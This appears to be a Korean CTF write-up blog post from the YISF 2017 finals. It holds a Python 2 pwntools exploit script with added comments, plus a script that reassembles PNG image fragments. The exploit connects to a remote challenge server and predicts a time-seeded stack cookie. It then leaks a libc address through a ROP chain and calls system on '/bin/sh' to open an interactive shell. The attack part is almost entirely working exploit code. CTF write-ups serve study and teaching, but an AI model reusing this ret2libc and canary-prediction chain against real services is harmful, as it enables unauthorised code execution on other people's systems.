Pwnable/CTF
YISF 2017 본선
HSr00t
2017. 8. 13. 23:27
pwnable custom canary challenge
문제에서 서버 시간이 한국 시간이라고 해서, 시스템 시간이 한국 시간으로 맞춰져 있는 내 칼리 리눅스에서 문제를 풀었다.
# Python 2 / pwntools solve script for the "custom canary" challenge (./echo).
#
# The script reproduces the two values that guard the return address by
# seeding libc's rand() with the current second. That only works if the
# binary builds its cookie from srand(time)/rand() -- presumably what the
# challenge does; the binary itself is not shown on this page.
# Defensive takeaway: a stack cookie derived from a clock-seeded PRNG is
# guessable by anyone who knows the time; cookies must come from an
# unpredictable source (the compiler's stack protector / kernel randomness).
from pwn import *
from ctypes import CDLL
#p=process("./echo")
p=remote("111.111.111.77",3452)
elf = ELF("./echo")
# Local libc, used only to run srand()/rand() in this process.
# NOTE(review): assumes the local rand() implementation matches the server's.
libc=CDLL("libc.so.6")
# time.time() is seconds since the epoch and does not depend on the local
# time zone; int() truncates it to whole seconds before it is used as seed.
a = time.time()
libc.srand(int(a))
# First two rand() outputs after seeding: the predicted cookie halves.
cookie = libc.rand()
cookie_2 = libc.rand()
print cookie
print int(a)
# Hard-coded addresses inside ./echo (no PIE assumed -- TODO confirm).
# pop_rdi is presumably a `pop rdi; ret` gadget, judging by its name and use.
pop_rdi = 0x400a53
# write_plt, main and canary are assigned but never used below.
write_plt = elf.plt['write']
main = 0x400995
canary = 0x00000000006010b0
sleep(3)
print p.recvuntil("input: ")
# Manual pause until Enter is pressed (e.g. to attach a debugger).
raw_input('$')
# Stage 1: 136 filler bytes, the two predicted 32-bit values, 8 more filler
# bytes, then a chain that calls puts(puts@got) to print a libc address.
payload = "A"*136
payload += p32(cookie)
payload += p32(cookie_2)
payload += "A"*8
payload += p64(pop_rdi)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
# 0x40094c: address in ./echo to continue at afterwards; presumably the
# input routine, since the script waits for the "input: " prompt again.
payload += p64(0x40094c)
p.sendline(payload)
print p.recvuntil("\n")
p.recv(1)
# Six bytes are read and padded with two NULs to form a 64-bit value.
puts = u64(p.recv(6)+"\x00\x00")
# Fixed offsets: valid only for the one libc build the author assumed.
base = puts - 0x06fd60
system = base+0x46590
BinSh = base+0x180503
print hex(puts)
print hex(base)
print hex(system)
# The cookie is predicted again from the current second before stage 2
# (presumably because the program re-seeds on re-entry -- TODO confirm).
a=time.time()
libc.srand(int(a))
cookie = libc.rand()
cookie_2 = libc.rand()
print hex(cookie)
print hex(cookie_2)
print p.recvuntil('input: ')
# Stage 2: same layout, but the chain now calls system() with the address
# computed above for BinSh as its argument.
payload = "A"*136
payload += p32(cookie)
payload += p32(cookie_2)
payload += "Q"*8
payload += p64(pop_rdi)
payload += p64(BinSh)
payload += p64(system)
p.sendline(payload)
p.interactive()
-MISC-
hex 값들을 합쳐서 이미지를 만들고, 얇은 이미지끼리 하나하나 합치는 문제였다.
# Python 2 script: each directory <i>/ holds three PNG fragments named
# "1", "2" and "3". The fragment that starts with the PNG signature is the
# head, the one that ends with the IEND chunk is the tail, and the remaining
# one is the middle. They are concatenated in place and the result is
# renamed to <i>/header.png, then copied to IMG/header<i>.png.
#
# NOTE: fragments are opened in append mode, so the input files are modified;
# running the script twice on the same tree appends the data again.
from os import system

# Hex of the first four bytes of a PNG file.
PNG_MAGIC = "89504e47"
# Hex of the last eight bytes of a PNG file ("IEND" + CRC).
IEND_TAIL = "49454e44ae426082"

# (head, tail) -> middle fragment. Every pair not listed falls back to "1",
# exactly like the final else branches of the original if/elif chain.
MIDDLE_OF = {
    ("1", "2"): "3",
    ("2", "1"): "3",
    ("3", "1"): "2",
    ("1", "3"): "2",
}


def _slurp(path):
    """Return the raw bytes of *path*."""
    with open(path, "rb") as fh:
        return fh.read()


def _append(path, blob):
    """Append *blob* to the end of *path*."""
    with open(path, "ab") as fh:
        fh.write(blob)


for i in range(1, 755):
    folder = str(i)

    # str.encode("hex") exists only in Python 2.
    hex_1 = _slurp(folder + "/1").encode("hex")
    hex_2 = _slurp(folder + "/2").encode("hex")
    # Fragment 3 is read but never inspected; it is the fallback choice.
    hex_3 = _slurp(folder + "/3").encode("hex")

    if hex_1.startswith(PNG_MAGIC):
        header = "1"
    else:
        header = "2" if hex_2.startswith(PNG_MAGIC) else "3"

    if hex_1.endswith(IEND_TAIL):
        last = "1"
    else:
        last = "2" if hex_2.endswith(IEND_TAIL) else "3"

    middle = MIDDLE_OF.get((header, last), "1")

    # middle += tail, then head += (middle + tail).
    _append(folder + "/" + middle, _slurp(folder + "/" + last))
    _append(folder + "/" + header, _slurp(folder + "/" + middle))

    system(" ".join(["mv", folder + "/" + header, folder + "/header.png"]))

# NOTE(review): the merge loop above covers directories 1..754, while this
# copy loop covers 1..789 -- confirm which range is intended.
for i in range(1, 790):
    source = str(i) + "/header.png"
    target = "IMG/header" + str(i) + ".png"
    system(" ".join(["cp", source, target]))